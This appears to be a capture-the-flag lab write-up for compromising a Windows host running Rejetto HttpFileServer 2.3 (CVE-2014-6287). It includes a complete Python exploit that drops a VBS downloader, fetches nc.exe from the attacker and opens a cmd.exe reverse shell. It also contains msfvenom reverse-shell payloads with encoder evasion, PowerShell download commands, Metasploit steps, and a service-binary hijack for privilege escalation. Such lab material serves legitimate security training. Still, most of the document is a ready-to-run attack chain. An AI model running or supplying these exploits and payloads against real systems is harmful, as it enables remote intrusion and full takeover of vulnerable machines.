The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program! Note: The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.
📕 RTFM (Metasploit)
# get the PowerUp.ps1 script for Windows (see in the DFIR section)
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
msfconsole
search rejetto # you can use spoitsearch first to find relevant exploits that can later be imported into metasploit.
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS
set RPORT
meterpreter >
upload /path/to/PowerUp.ps1/script/on/the/attacker\'s/machine
load powershell
powershell_shell
. .\PowerUp.ps1 # yes, . .\PowerUp.ps1, not just .\PowerUp.ps1
Invoke-AllChecks # Lists all misconfigs that can leas to PE.
# Abusing a legit Service Path
# https://www.mandiant.com/resources/blog/shikata-ga-nai-encoder-still-going-strong
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.7.88 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ServiceToAbuse.exe
meterpreter> shell
sc stop ServiceToAbuse # if the service is started, you won't be able to overwrite it. You will get "process is being used" error
meterpreter> cd /path/to/the/service/to/abuse # shell and meterpreter might have differnt current paths
meterpreter> upload /path/to/venom/exe/on/attacking/machine # uploading the service will overwrite the ligit one
# Run a listener. Option #1: netcat
nc -l -p 4443 # the same specified in the msfvenom command
# ❗️ Run a listener. Option #2: msfconsole (use a different msfconsole Terminal)
# the module to use is called exploit/multi/handler
use exploit/multi/handler
set LHOST <attacker\'s IP>
set LPORT <attacker\'s Port> # the same specified in the msfvenom command
run
meterpreter> shell
sc start ServiceToAbuse # if the service is started, you won't be able to overwrite it. You will get "process is being used" error
# check your listener
PowerUp.ps1 and winPEAS are two different ways to do the job.
Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!
https://www.exploit-db.com/exploits/39161 standalone netcat - https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/ncat.exe
📕 RTFM (Manual)
Let’s asume the following:
- My attacking machine’s IP is
X.X.X.X
- The first netcat listner is sitting on port
YYYY
(normal user session) - My python webser is listening on port
80
(webser hostingnc.exe
) - My second netcat listener is sitting on port
ZZZZ
(elevated session)
- The first netcat listner is sitting on port
- My victim machine’s IP is
S.S.S.S
Steps:
- Download the exploit script (see the update script for Python 3 below).
- Download winPEAS.
- Download standalone netcat.
- Rename it to
nc.exe
(since the exploit is looking fornc.exe
and on github it’s calledncat.exe
instead).
- Rename it to
- Download accesschk.exe.
- From whatever directory you have saved the above executables in, run the followng command in the Terminal/console:
python -m http.server 80
. Note, that the port is set to80
. On TryHackMe you won’t be able to do that easily with an Attack Machine since the port is occupied by some python remote desktop process. In order to make it work, you need to modify thevba
script and explicitly specify a different port (vbs
variable). Make sure to URL encode the:80
before adding. You can also rename thenc.exe
toncat.exe
, instead of renaming the executable itself. Your call.
' from
xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False
'to
xHttp.Open "GET", "http://"+ip_addr+":80/nc.exe", False
- Run
nc -l YYYY
on the attacker’s machine so that whennc_run()
function is run, nc.exe downloaded from your python-powered server could connect to your machine. - Run the script itself with
python -m 39161.py S.S.S.S 8080
(note that39161.py
is the default name for this exploit and it might be different in future). If no errors are shown, but the pyton server doesn’t show any activity andnc
doesn’t receive any connections, rerun the exploit several times. - Monitor the Terminal with python server running to see if the exploit worked (set up on step 7).
- Monitor the Terminal with netcat running to see if any remote session was successfully established (set up on step 6).
- Now, in the Terminal window with the nc session successfully established, check the user by running
whoami
. If all is ok, then run the following powershell command to downloadwinPEAS.exe
(to check for misconfigurations that allow privelege escalation) andaccesschk.exe
(to check file and folder permissions). Sometimes with mac, when you copy a string with a singe quote, it changes it to a `. If powershell complains, check the quotes and better overwrite them manually.
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/winPEAS.exe','C:\Program Files (x86)\IObit\winpeas.exe')
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/accesschk.exe','C:\Program Files (x86)\IObit\achk.exe')
- If all is ok and the files were copied successfully (try Desktop to save them), run
winpeas.exe
. In this lab we were provided a hint that we can exploit some unquoted service path. You can runwinpeas.exe quiet servicesinfo
to see only services’ vulnerabilities. Our aim is to find the service that:- Runs with admin (SYSTEM) rights;
- The current user (in this case, bill) can start and stop it;
- The current use can wrte to the directory the service executable is stored at.
- For each service check if they satisfy every requirement listed above with
achk.exe /accepteula -ucqv <servicename>
.-
-u
stands for “user” and returns information about the user account the specified service runs under.
-c
indicates that the user account must have the “Log on as a service” right.-q
specifies that the output should be in a quiet mode, i.e., with minimal output.-v
is for verbose mode and provides more detailed information.
-
- Since it’s the unquoted service path vulnerability, we need to upload our executable with a specific name. Read more about this type of vulnerabilty here [3].
The exploit script was written for Python 2, so I had to add parentheses to the print
function. It also used an outdated library, so I had to change the calls from urllib2
to urllib3
and the function it was calling, since they are two completely different libraries. To make troubleshooting easier, I added try-except
blocks.
#!/Users/sherlock/.pyenv/versions/3.9.11/envs/python39/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
import urllib3
import sys
try:
def script_create():
try:
http = urllib3.PoolManager()
url = "http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}"
response = http.request('GET', url)
print("All good! script_create executed.")
except Exception as e:
print("script_create failed: {}".format(e))
def execute_script():
try:
http = urllib3.PoolManager()
url = "http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}"
response = http.request('GET', url)
print("All good! execute_script executed.")
except Exception as e:
print("execute_script failed: {}".format(e))
def nc_run():
try:
http = urllib3.PoolManager()
url = "http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}"
response = http.request('GET', url)
print("All good! nc_run executed.")
except Exception as e:
print("nc_run failed: {}".format(e))
ip_addr = "X.X.X.X" #local IP address
local_port = "YYYY" # Local Port number
vbs = r"C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
save= "save|" + vbs
vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
exe= "exec|"+vbs2
vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
exe1= "exec|"+vbs3
script_create()
execute_script()
nc_run()
except:
print("""[.]Something went wrong..!
Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
Don't forgot to change the Local IP address and Port number on the script""")
powershell -c (new-object System.Net.WebClient).DownloadFile('http://X.X.X.X/Advanced.exe','C:\Program Files (x86)\IObit\Advanced.exe')
msfvenom -p windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=ZZZZ -f exe -o Advanced.exe
References
Expand…
1
A great write up for this lab - https://medium.com/@algobernadortaco/steel-mountain-tryhackme-write-up-w-o-metasploit-c6dd5836ac09 (an option without metasploit).